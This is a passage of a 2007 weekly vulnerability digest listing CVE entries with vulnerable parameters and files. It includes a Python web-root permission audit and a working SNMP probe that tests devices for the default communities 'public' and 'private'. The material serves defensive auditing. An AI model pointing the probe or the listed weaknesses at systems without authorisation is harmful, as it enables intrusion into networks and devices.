Weekly Vulnerabilities Reports > April 16 to 22, 2007

Overview

149 new vulnerabilities were reported during this period, including 30 critical and 57 high-severity vulnerabilities. This weekly summary reports vulnerabilities in 116 products from 93 vendors, including Oracle, Cisco, Microsoft, Maian, and Stephen Craton. The most common weakness categories are "Code Injection", "Resource Management Errors", "Permissions, Privileges, and Access Controls", "SQL Injection", and "Numeric Errors".

  • 133 reported vulnerabilities are remotely exploitable.
  • 29 reported vulnerabilities have a public exploit available.
  • 2 reported vulnerabilities are related to weaknesses in the OWASP Top Ten.
  • 137 reported vulnerabilities are exploitable by an anonymous user.
  • Oracle has the most reported vulnerabilities, with 27.
  • Oracle has the most reported critical vulnerabilities, with 15.

Summary table: total vulnerabilities; critical, high, medium and low risk vulnerabilities; remotely exploitable; locally exploitable; exploit available; exploitable anonymously; affecting web applications.

Vulnerability Details

The following table lists the reported vulnerabilities for the period covered by this report:


30 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-22 CVE-2007-2137 IBM Heap Buffer Overflow vulnerability in IBM Tivoli Monitoring Express 6.1.0

Heap-based buffer overflow in kde.dll in IBM Tivoli Monitoring Express 6.1.0 before Fix Pack 2, as used in Tivoli Universal Agent, Windows OS Monitoring agent, and Enterprise Portal Server, allows remote attackers to execute arbitrary code by sending a long string to a certain TCP port.

10.0
2007-04-19 CVE-2007-2149 Stephen Craton Remote Security vulnerability in Chatness

Stephen Craton (aka WiredPHP) Chatness 2.5.3 and earlier stores usernames and unencrypted passwords in (1) classes/vars.php and (2) classes/varstuff.php, and recommends 0666 or 0777 permissions for these files, which allows local users to gain privileges by reading the files, and allows remote attackers to obtain credentials via a direct request for admin/options.php.

10.0
2007-04-19 CVE-2007-2147 Stephen Craton Remote Security vulnerability in Chatness

admin/options.php in Stephen Craton (aka WiredPHP) Chatness 2.5.3 and earlier does not check for administrative credentials, which allows remote attackers to read and modify the classes/vars.php and classes/varstuff.php configuration files via direct requests.

10.0
2007-04-18 CVE-2007-2133 Oracle Multiple vulnerability in Oracle Peoplesoft Enterprise 8.9

Unspecified vulnerability in the PeopleSoft Enterprise Human Capital Management component in Oracle PeopleSoft Enterprise 8.9 has unknown impact and attack vectors, aka PSEHCM01.

10.0
2007-04-18 CVE-2007-2132 Oracle Multiple vulnerability in Oracle Peoplesoft Enterprise 8.47.12/8.48.08

Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise 8.47.12 and 8.48.08 has unknown impact and attack vectors, aka PSE02.

10.0
2007-04-18 CVE-2007-2131 Oracle Multiple vulnerability in Oracle Peoplesoft Enterprise 8.22.14/8.47.12/8.48.08

Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.22.14, 8.47.12, and 8.48.08 has unknown impact and attack vectors, aka PSE01.

10.0
2007-04-18 CVE-2007-2129 Oracle Multiple vulnerability in Oracle Enterprise Manager 9.2.0.8

Unspecified vulnerability in the Agent component in Oracle Enterprise Manager 9.2.0.8 has unknown impact and remote attack vectors, aka EM01.

10.0
2007-04-18 CVE-2007-2127 Oracle Multiple vulnerability in Oracle E-Business Suite 12.0.0

Multiple unspecified vulnerabilities in Oracle E-Business Suite 12.0.0 have unknown impact and remote attack vectors via (1) Application Object Library (APPS04), iStore (2) APPS05 and (3) APPS06, (4) iSupport (APPS07), (5) Trade Management (APPS09), (6) Applications Manager (APPS10), and (7) Oracle Report Manager (APPS03).

10.0
2007-04-18 CVE-2007-2126 Oracle Multiple vulnerability in Oracle E-Business Suite 11.5.10.2

Unspecified vulnerability in Oracle E-Business Suite 11.5.10CU2 has unknown impact and remote attack vectors in the (1) Common Applications (APPS01) and (2) iProcurement (APPS02).

10.0
2007-04-18 CVE-2007-2125 Oracle Multiple vulnerability in Oracle Collaboration Suite 10.1.2

Unspecified vulnerability in Collaborative Workspace in Oracle Collaboration Suite 10.1.2 has unknown impact and attack vectors, aka OCS01.

10.0
2007-04-18 CVE-2007-2124 Oracle Multiple vulnerability in Oracle Application Server 10.1.4.1.0

Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.4.1.0 has unknown impact and remote attack vectors, aka AS05.

10.0
2007-04-18 CVE-2007-2123 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.3 up to 10.1.3.2.0, 10.1.2 up to 10.1.2.2.0, and 9.0.4.3 has unknown impact and attack vectors, aka AS04.

10.0
2007-04-18 CVE-2007-2122 Oracle Multiple vulnerability in Oracle Application Server 9.0.4.3

Unspecified vulnerability in the Wireless component in Oracle Application Server 9.0.4.3 has unknown impact and attack vectors, aka AS03.

10.0
2007-04-18 CVE-2007-2121 Oracle Multiple vulnerability in Oracle Application Server 7.0.4.4

Unspecified vulnerability in the COREid Access component in Oracle Application Server 7.0.4.4 has unknown impact and attack vectors, aka AS02.

10.0
2007-04-18 CVE-2007-2101 FAC Guestbook Information Disclosure vulnerability in FAC Guestbook 3.01

FAC Guestbook 3.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/gbdb.mdb.

10.0
2007-04-18 CVE-2007-2100 FAC Guestbook Information Disclosure vulnerability in FAC Guestbook 2.0

FAC Guestbook 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/Gdb.mdb.

10.0
2007-04-18 CVE-2007-2059 Eiqnetworks Remote Security vulnerability in Eiqnetworks Enterprise Security Analyzer 2.5

Multiple buffer overflows in the ESA protocol implementation in eIQnetworks Enterprise Security Analyzer (ESA) 2.5 allow remote attackers to execute arbitrary code via a long parameter to the (1) DELETESEARCHFOLDER, (2) DELTASK, (3) HMGR_CHECKHOSTSCSV, (4) TASKUPDATEDUSER, (5) VERIFYUSERKEY, or (6) VERIFYPWD command.

10.0
2007-04-18 CVE-2007-2057 Aircrack NG Buffer Overflow vulnerability in Aircrack-Ng Airodump-Ng 0.7

Stack-based buffer overflow in aircrack-ng airodump-ng 0.7 allows remote attackers to execute arbitrary code via crafted 802.11 authentication packets.

10.0
2007-04-18 CVE-2007-1674 Landesk Buffer Overflow vulnerability in Landesk Management Suite 8.7

Stack-based buffer overflow in the Alert Service (aolnsrvr.exe) in LANDesk Management Suite 8.7 allows remote attackers to execute arbitrary code via a crafted packet to port 65535/UDP.

10.0
2007-04-16 CVE-2007-2036 Cisco Remote vulnerability in Cisco Wireless LAN Controller Software 4.1

The SNMP implementation in the Cisco Wireless LAN Controller (WLC) before 20070419 uses the default read-only community "public" and the default read-write community "private", which allows remote attackers to read and modify SNMP variables, aka Bug ID CSCse02384.

10.0
2007-04-16 CVE-2007-2031 3Proxy Buffer Overflow vulnerability in 3proxy HTTP Proxy Request

Buffer overflow in the HTTP proxy service for 3proxy 0.5 to 0.5.3g, and 0.6b-devel before 20070413, might allow remote attackers to execute arbitrary code via crafted transparent requests.

10.0
2007-04-18 CVE-2007-2079 Xampp Remote Buffer Overflow vulnerability in XAMPP Mssql_Connect

The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long host parameter, or have other unspecified impact.

9.3
2007-04-18 CVE-2007-2062 Vcdgear Remote Buffer Overflow vulnerability in VCDGear File Format

Stack-based buffer overflow in VCDGear 3.55 and 3.56 BETA allows user-assisted remote attackers to execute arbitrary code via a long FILE argument in a CUE file.

9.3
2007-04-18 CVE-2007-1892 Akamai Technologies Buffer Overflow vulnerability in Akamai Technologies Download Manager 2.2.0.0

Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2007-1891.

9.3
2007-04-18 CVE-2007-1891 Akamai Technologies Buffer Overflow vulnerability in Akamai Technologies Download Manager 2.2.0.0

Stack-based buffer overflow in the GetPrivateProfileSectionW function in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) after 2.0.4.4 but before 2.2.1.0 allows remote attackers to execute arbitrary code, related to misinterpretation of the nSize parameter as a byte count instead of a wide character count.

9.3
2007-04-18 CVE-2007-2130 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in Workflow Cartridge, as used in Oracle Database Server 9.2.0.1, 10.1.0.2, and 10.2.0.1; Application Server 9.0.4.3 and 10.1.2.0.2; Collaboration Suite 10.1.2; and E-Business Suite; has unknown impact and remote authenticated attack vectors, aka OWF01.

9.0
2007-04-18 CVE-2007-2128 Oracle Multiple vulnerability in Oracle E-Business Suite 11.5.10

Unspecified vulnerability in the Sales Online component for Oracle E-Business Suite 11.5.10 has unknown impact and remote authenticated attack vectors, aka APPS08.

9.0
2007-04-18 CVE-2007-2116 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the Advanced Replication component in Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.5 has unknown impact and attack vectors, aka DB10.

9.0
2007-04-18 CVE-2007-2114 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 and 10.2.0.2 have unknown impact and remote authenticated attack vectors, related to (1) Change Data Capture (CDC), aka DB08, and (2) Oracle Instant Client, aka DB11.

9.0
2007-04-16 CVE-2007-2034 Cisco Multiple vulnerability in Cisco Wireless Control System

Unspecified vulnerability in Cisco Wireless Control System (WCS) before 4.0.87.0 allows remote authenticated users to gain the privileges of the SuperUsers group, and manage the application and its networks, related to the group membership of user accounts, aka Bug ID CSCsg05190.

9.0
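
Two of the critical entries above are the same deployment mistake seen from two sides: CVE-2007-2149 (Chatness keeps usernames and passwords in classes/vars.php and classes/varstuff.php and recommends 0666 or 0777 permissions on them) and CVE-2007-2100/CVE-2007-2101 (FAC Guestbook leaves its Access database at db/gbdb.mdb under the web root, where any request fetches it). The audit below is an added example written for this report, not code from either project: it walks a web root and flags world-writable files, database files that the web server would serve as static content, and credential-bearing PHP files readable by every local account. The files in build_demo_tree() are constructed for the demonstration; only the file names are borrowed from the entries above, the contents and the credential "hunter2" are fake.

```python
"""Audit a web root for world-writable files, database files served as
static content, and credential-bearing PHP files readable by any local user.
Added example; the demo tree it audits is constructed, not real software."""
import os
import re
import shutil
import stat
import tempfile

DB_SUFFIXES = (".mdb", ".sqlite", ".db", ".sql")
# An assignment to a name ending in pass/password/passwd, e.g.  $password = '...'
CREDENTIAL_RE = re.compile(rb"pass(?:word|wd)?\s*=\s*[\"']", re.IGNORECASE)


def _holds_credentials(path, limit=65536):
    """Cheap content check: look at the first 64 KiB for a password assignment."""
    with open(path, "rb") as fh:
        return CREDENTIAL_RE.search(fh.read(limit)) is not None


def audit_webroot(root):
    """Return sorted (path relative to root, finding) pairs for regular files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue                      # symlinks, sockets etc. are out of scope
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if mode & stat.S_IWOTH:           # the 0666 / 0777 advice from the Chatness entry
                findings.append((rel, "world-writable (mode %04o)" % (mode & 0o777)))
            if name.lower().endswith(DB_SUFFIXES):   # the FAC Guestbook .mdb under the web root
                findings.append((rel, "database file under web root"))
            if name.lower().endswith(".php") and mode & stat.S_IROTH and _holds_credentials(path):
                findings.append((rel, "credentials in world-readable file"))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample web root: names mirror the entries above, contents are fake."""
    root = tempfile.mkdtemp(prefix="webroot-")

    def put(rel, content, mode):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
        os.chmod(full, mode)

    put("classes/vars.php", b"<?php $username = 'admin'; $password = 'hunter2'; ?>", 0o666)
    put("classes/varstuff.php", b"<?php $adminpass = 'hunter2'; ?>", 0o777)
    put("db/gbdb.mdb", b"\x00\x01\x00\x00Standard Jet DB", 0o644)
    put("index.php", b"<?php require 'classes/vars.php'; ?>", 0o644)   # clean file, no finding
    return root


def demo():
    """Build the sample tree, audit it, remove it; returns the findings list."""
    root = build_demo_tree()
    try:
        return audit_webroot(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

Run against a real deployment with audit_webroot("/var/www/html"). The fix the findings point at is the same in both cases: keep databases and credential files outside the document root, and give a configuration file the web server must read a mode like 0640 owned by the application account with the web server's group, rather than 0666 or 0777.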

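CVE-2007-2036 above is a default-credential bug in an SNMP agent: the WLC answered the read-only community "public" and the read-write community "private". The check a network team wants is whether a device still answers a GetRequest sent with those strings. The code below is an added example, not Cisco's and not this report's: it builds a minimal SNMPv1 GetRequest for sysDescr.0 (OID 1.3.6.1.2.1.1.1.0) with hand-rolled BER so it needs nothing beyond the standard library, decodes the GetResponse, and decides from the PDU whether the community was accepted. build_get_response() exists only to construct the sample reply used offline; probe() is the one networked function and is not exercised here. The target address 192.0.2.1 in the usage note is a documentation address, not a real device.

```python
"""SNMPv1 default-community probe, BER hand-rolled; added example, not vendor code."""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"          # sysDescr.0, readable with any read-only community
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2  # SNMPv1 PDU tags (context-specific 0 and 2)

def _tlv(tag, body):
    n = len(body)
    if n < 0x80:                                     # short-form length
        return bytes([tag, n]) + body
    size = (n.bit_length() + 7) // 8                 # long form: 0x80|size, then size bytes
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + body

def _int(value):
    # non-negative INTEGER, minimal length, leading 0x00 when the top bit would be set
    return _tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))

def _oid(dotted):
    # OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128 big-endian
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return _tlv(0x06, bytes(out))

def _message(pdu_tag, community, request_id, varbinds):
    # SEQUENCE { version 0, community, PDU { request-id, error-status 0, error-index 0, varbinds } }
    vbl = b"".join(_tlv(0x30, _oid(oid) + value) for oid, value in varbinds)
    pdu = _int(request_id) + _int(0) + _int(0) + _tlv(0x30, vbl)
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + _tlv(pdu_tag, pdu))

def build_get_request(community, oid=SYS_DESCR, request_id=1):
    return _message(GET_REQUEST, community, request_id, [(oid, _tlv(0x05, b""))])

def build_get_response(community, request_id, oid, value):
    # what an agent sends back; used here only to construct the offline sample reply
    return _message(GET_RESPONSE, community, request_id, [(oid, _tlv(0x04, value))])

def _read_tlv(data, pos):
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def _decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def _decode(tag, body):
    if tag == 0x02:
        return int.from_bytes(body, "big", signed=True)
    return body.decode("utf-8", errors="replace") if tag == 0x04 else body  # NULL etc. stay raw

def parse_message(data):
    """Decode an SNMPv1 message into a dict; raises IndexError on truncated input."""
    _, body, _ = _read_tlv(data, 0)
    _, ver, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_tag, pdu, _ = _read_tlv(body, pos)
    _, rid, pos = _read_tlv(pdu, 0)
    _, err, pos = _read_tlv(pdu, pos)
    _, _idx, pos = _read_tlv(pdu, pos)     # error-index, not needed here
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid, p = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, p)
        varbinds.append((_decode_oid(oid), _decode(vtag, val)))
    return {"version": _decode(0x02, ver), "community": _decode(0x04, community), "pdu": pdu_tag,
            "request_id": _decode(0x02, rid), "error_status": _decode(0x02, err), "varbinds": varbinds}

def community_accepted(reply, request_id):
    """A GetResponse to our request-id with error-status 0 means the community was accepted;
    SNMPv1 agents stay silent on a wrong community, so no reply (None) means rejected."""
    if not reply:
        return False
    try:
        msg = parse_message(reply)
    except IndexError:
        return False
    return msg["pdu"] == GET_RESPONSE and msg["request_id"] == request_id and msg["error_status"] == 0

def probe(host, community, port=161, timeout=2.0):
    """The only networked part: one GetRequest over UDP, True if the community is accepted."""
    request_id = 0x5A17
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_get_request(community, request_id=request_id), (host, port))
        try:
            reply, _ = sock.recvfrom(4096)
        except socket.timeout:
            reply = None
    return community_accepted(reply, request_id)
```

Against a real controller the whole check is `any(probe("192.0.2.1", c) for c in ("public", "private"))`; offline, `community_accepted(build_get_response("public", 0x5A17, SYS_DESCR, b"Cisco Controller"), 0x5A17)` returns True and stands in for a device that still answers the default string. The request-id match matters: without it a stray or replayed GetResponse from another probe would count as a hit.
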
57 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-19 CVE-2007-2152 Mcafee Buffer Overflow vulnerability in Mcafee Virusscan Enterprise 8.0I

Buffer overflow in the On-Access Scanner in McAfee VirusScan Enterprise before 8.0i Patch 12 allows user-assisted remote attackers to execute arbitrary code via a long filename containing multi-byte (Unicode) characters.

7.9
2007-04-22 CVE-2007-2162 GNU, Mozilla Denial-Of-Service vulnerability in Iceweasel

(1) Mozilla Firefox 2.0.0.3 and (2) GNU IceWeasel 2.0.0.3 allow remote attackers to cause a denial of service (browser crash or system hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

7.8
2007-04-19 CVE-2007-2157 Zomplog Directory Traversal vulnerability in Zomplog 3.8

Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) sequence.

7.8
2007-04-19 CVE-2007-2155 Phpfaber Directory Traversal vulnerability in PHPFaber TopSites Admin/

Directory traversal vulnerability in template.php in phpFaber TopSites 3 allows remote attackers to read arbitrary files via a .. (dot dot) sequence.

7.8
2007-04-19 CVE-2007-2150 Bluearc Unspecified vulnerability in Bluearc Titan 2100/2200/2500

BlueArc-FTPD in BlueArc Titan 2x00 devices with firmware 4.2.944b allows remote attackers to redirect traffic to other sites (aka FTP bounce) via the PORT command, a variant of CVE-1999-0017.

7.8
2007-04-18 CVE-2007-2120 Oracle Resource Management Errors vulnerability in Oracle Application Server 10.1.2.0.2/10.1.2.2/9.0.4.3

The Oracle Discoverer servlet in Oracle Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2.0 allows remote attackers to shut down an Oracle TNS Listener via a TNS STOP command in a request that uses the database/TNS alias, aka AS01.

7.8
2007-04-18 CVE-2007-1870 Lighttpd Remote Denial of Service vulnerability in Lighttpd

lighttpd before 1.4.14 allows attackers to cause a denial of service (crash) via a request to a file whose mtime is 0, which results in a NULL pointer dereference.

7.8
2007-04-16 CVE-2007-2035 Cisco Multiple vulnerability in Cisco Wireless Control System

Cisco Wireless Control System (WCS) before 4.0.66.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain network organization data via a direct request for files in certain directories, aka Bug ID CSCsg04301.

7.8
2007-04-22 CVE-2007-2169 Mozzers Subsystem Remote Code Execution vulnerability in Mozzers SubSystem Add.PHP

Static code injection vulnerability in add.php in Mozzers SubSystem 1.0 allows remote attackers to inject PHP code into subs.php via the (1) Sub-name or (2) Sub-url field.

7.5
2007-04-22 CVE-2007-2168 Aimstats Remote Code Execution vulnerability in AimStats Process.PHP

Static code injection vulnerability in process.php in AimStats 3.2 and earlier allows remote attackers to inject PHP code into config.php via the databasehost parameter.

7.5
2007-04-22 CVE-2007-2167 Aimstats Remote Code Execution vulnerability in Aimstats 3.2

Static code injection vulnerability in process.php in AimStats 3.2 allows remote attackers to inject PHP code into config.php via the number parameter in an update action.

7.5
2007-04-22 CVE-2007-2160 Drupal Cross-Site Request Forgery vulnerability in Drupal Database Administration Module 4.6/4.7

Multiple cross-site request forgery (CSRF) vulnerabilities in the Database Administration (dba) module 4.6.x-*, and before 4.7.x-1.2 in the 4.7.x-1.* series, for Drupal allow remote attackers to perform unauthorized actions as an arbitrary user, a related issue to CVE-2006-5476.

7.5
2007-04-22 CVE-2007-2136 BMC Unspecified vulnerability in BMC Patrol Perform Agent

Stack-based buffer overflow in bgs_sdservice.exe in BMC Patrol PerformAgent allows remote attackers to execute arbitrary code by connecting to TCP port 10128 and sending certain XDR data, which is not properly parsed.

7.5
2007-04-22 CVE-2007-1972 BMC Unspecified vulnerability in BMC Performance Manager

** DISPUTED ** PatrolAgent.exe in BMC Performance Manager does not require authentication for requests to modify configuration files, which allows remote attackers to execute arbitrary code via a request on TCP port 3181 for modification of the masterAgentName and masterAgentStartLine SNMP parameters.

7.5
2007-04-19 CVE-2007-2158 Kooijman Design Remote Security vulnerability in Kooijman-Design Jgallery 1.3

PHP remote file inclusion vulnerability in index.php in jGallery 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the G_JGALL[inc_path] parameter.

7.5
2007-04-19 CVE-2007-2156 Rezervi Generic Remote File Include vulnerability in Rezervi Root Parameter

Multiple PHP remote file inclusion vulnerabilities in Rezervi Generic 0.9 allow remote attackers to execute arbitrary PHP code via a URL in the root parameter to (1) datumVonDatumBis.inc.php, (2) footer.inc.php, (3) header.inc.php, and (4) stylesheets.php in templates/; and (5) wochenuebersicht.inc.php, (6) monatsuebersicht.inc.php, (7) jahresuebersicht.inc.php, and (8) tagesuebersicht.inc.php in belegungsplan/.

7.5
2007-04-19 CVE-2007-2154 Cabron Connector Remote File Include vulnerability in Cabron Connector InclusionService.PHP

PHP remote file inclusion vulnerability in services/samples/inclusionService.php in Cabron Connector 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the CabronServiceFolder parameter.

7.5
2007-04-19 CVE-2007-2146 Minigal Remote Security vulnerability in Minigal B13

The imagecomments function in classes.php in MiniGal b13 allows remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the (1) name or (2) email parameter.

7.5
2007-04-19 CVE-2007-2145 Minigal Remote Security vulnerability in Minigal B13

The imagecomments function in classes.php in MiniGal b13 allows remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the input parameter.

7.5
2007-04-19 CVE-2007-2143 Bonoestente Remote File Include vulnerability in Joomla Template Module

PHP remote file inclusion vulnerability in index.php in the Be2004-2 template for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

7.5
2007-04-19 CVE-2007-2142 Ajportal2Php Remote File Include vulnerability in AJPortal2PHP

Multiple PHP remote file inclusion vulnerabilities in AjPortal2Php allow remote attackers to execute arbitrary PHP code via a URL in the PagePrefix parameter to (1) begin.inc.php, (2) connection.inc.php, (3) events.inc.php, (4) footer.inc.php, (5) header.inc.php, (6) menuleft.inc.php, or (7) pages.inc.php in includes/.

7.5
2007-04-19 CVE-2007-2141 Shoutpro Remote PHP Code Execution vulnerability in ShoutPro Shoutbox.PHP

Direct static code injection vulnerability in shoutbox.php in ShoutPro 1.5.2 allows remote attackers to inject arbitrary PHP code into shouts.php via the shout parameter.

7.5
2007-04-19 CVE-2007-2140 Franklin Huang Remote Security vulnerability in Franklin Huang Flip-Search-Add-On 2.0

PHP remote file inclusion vulnerability in everything.php in Franklin Huang Flip (aka Flip-search-add-on) 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the incpath parameter.

7.5
2007-04-19 CVE-2007-1681 SUN Unspecified vulnerability in SUN Java web Console and Solaris

Format string vulnerability in libwebconsole_services.so in Sun Java Web Console 2.2.2 through 2.2.5 allows remote attackers to cause a denial of service (application crash), obtain sensitive information, and possibly execute arbitrary code via unspecified vectors during a failed login attempt, related to syslog.

7.5
2007-04-18 CVE-2007-2118 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the Upgrade/Downgrade component of Oracle Database 9.0.1.5 and 9.2.0.7 has unknown impact and attack vectors, aka DB13.

7.5
2007-04-18 CVE-2007-2113 Oracle SQL Injection vulnerability in Oracle Database Server 10.1.0.5

SQL injection vulnerability in the Upgrade/Downgrade component (DBMS_UPGRADE_INTERNAL) for Oracle Database 10.1.0.5 allows remote authenticated users to execute arbitrary SQL commands via unknown vectors, aka DB07.

7.5
2007-04-18 CVE-2007-2107 Rha7 Downloads SQL-Injection vulnerability in Rha7 Downloads 1.0

SQL injection vulnerability in visit.php in the Rha7 Downloads (rha7downloads) 1.0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the cid parameter, a different vector than CVE-2007-1960.

7.5
2007-04-18 CVE-2007-2106 KAI Content Management System File-Upload vulnerability in KAI Content Management System 1.0

Directory traversal vulnerability in index.php in Kai Content Management System (K-CMS) 1.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) sequence.

7.5
2007-04-18 CVE-2007-2105 Monkey CMS File-Upload vulnerability in Monkey CMS 0.0.3

Directory traversal vulnerability in admin/index.php in Monkey CMS 0.0.3 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) sequence.

7.5
2007-04-18 CVE-2007-2104 Ixon CMS File-Upload vulnerability in Ixon CMS 0.30

Multiple directory traversal vulnerabilities in iXon CMS 0.30 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) sequence.

7.5
2007-04-18 CVE-2007-2103 MY Little Homepage Remote Security vulnerability in MY Little Homepage MY Little Forum 1.7

Multiple PHP remote file inclusion vulnerabilities in my little forum 1.7 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) admin.php and (2) timedifference.php.

7.5
2007-04-18 CVE-2007-2097 Openconcept Unspecified vulnerability in Openconcept Back-End CMS 0.4.7

** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End CMS 0.4.7 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter to (1) click.php or (2) pollcollector.php in htdocs/; or (3) index.php, (4) articlepages.php, (5) articles.php, (6) articleform.php, (7) articlesections.php, (8) createArticlesPage.php, (9) guestbook.php, (10) helpguide.php, (11) helpguideeditor.php, (12) links.php, (13) upload.php, (14) sitestatistics.php, (15) nav.php, (16) tpl_upload.php, (17) linksections, or (18) pophelp.php in htdocs/site-admin/; different vectors than CVE-2006-5076.

7.5
2007-04-18 CVE-2007-2096 Hinton Design Remote Security vulnerability in Phphd Download System

PHP remote file inclusion vulnerability in common.php in Hinton Design PHPHD Download System (phphd_downloads) allows remote attackers to execute arbitrary PHP code via a URL in the phphd_real_path parameter.

7.5
2007-04-18 CVE-2007-2095 Myspeach Remote Security vulnerability in Myspeach 1.9

PHP remote file inclusion vulnerability in chat.php in MySpeach 1.9 allows remote attackers to execute arbitrary PHP code via a URL in the my[root] parameter, a different vector than CVE-2007-0498.

7.5
2007-04-18 CVE-2007-2094 Anthologia Remote File Include vulnerability in Anthologia 0.5.2

PHP remote file inclusion vulnerability in index.php in Anthologia 0.5.2 allows remote attackers to execute arbitrary PHP code via a URL in the ads_file parameter.

7.5
2007-04-18 CVE-2007-2093 Limesoft Remote PHP Code Execution vulnerability in Limesoft Guestbook 1.0

Direct static code injection vulnerability in index.php in Limesoft Guestbook (LS Simple Guestbook) 1.0 allows remote attackers to inject arbitrary PHP code into posts.txt via the message parameter.

7.5
2007-04-18 CVE-2007-2092 Limesoft Remote Security vulnerability in Limesoft Guestbook 1.0

Direct static code injection vulnerability in index.php in Limesoft Guestbook (LS Simple Guestbook) allows remote attackers to inject arbitrary PHP code into posts.txt via the name parameter.

7.5
2007-04-18 CVE-2007-2091 Tsdisplay4Xoops Code Injection vulnerability in Tsdisplay4Xoops 0.1

PHP remote file inclusion vulnerability in blocks/tsdisplay4xoops_block2.php in tsdisplay4xoops (TSD4XOOPS, aka the TeamSpeak display module) 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the xoops_url parameter.

7.5
2007-04-18 CVE-2007-2088 Sitebar Remote Security vulnerability in SiteBar

Multiple PHP remote file inclusion vulnerabilities in Sitebar 3.3.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) writerFile parameter to index.php and the (2) file parameter to Integrator.php.

7.5
2007-04-18 CVE-2007-2081 Myblog Authentication Bypass vulnerability in MyBlog Settings.PHP

MyBlog 0.9.8 and earlier allows remote attackers to bypass authentication requirements via the admin cookie parameter to certain admin files, as demonstrated by admin/settings.php.

7.5
2007-04-18 CVE-2007-2080 Xampp SQL-Injection vulnerability in Xampp Apache Distribution 1.6.0A

Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts.

7.5
2007-04-18 CVE-2007-2077 Maian Remote Security vulnerability in Maian Search 1.1

PHP remote file inclusion vulnerability in search.php in Maian Search 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter.

7.5
2007-04-18 CVE-2007-2073 Ivan Gallery Script Remote Security vulnerability in Ivan Gallery Script 0.3

PHP remote file inclusion vulnerability in index.php in Ivan Gallery Script 0.3 allows remote attackers to execute arbitrary PHP code via a URL in the gallery parameter in a new session.

7.5
2007-04-18 CVE-2007-2072 Ivan Gallery Script Remote File Include vulnerability in Ivan Gallery Script 0.1

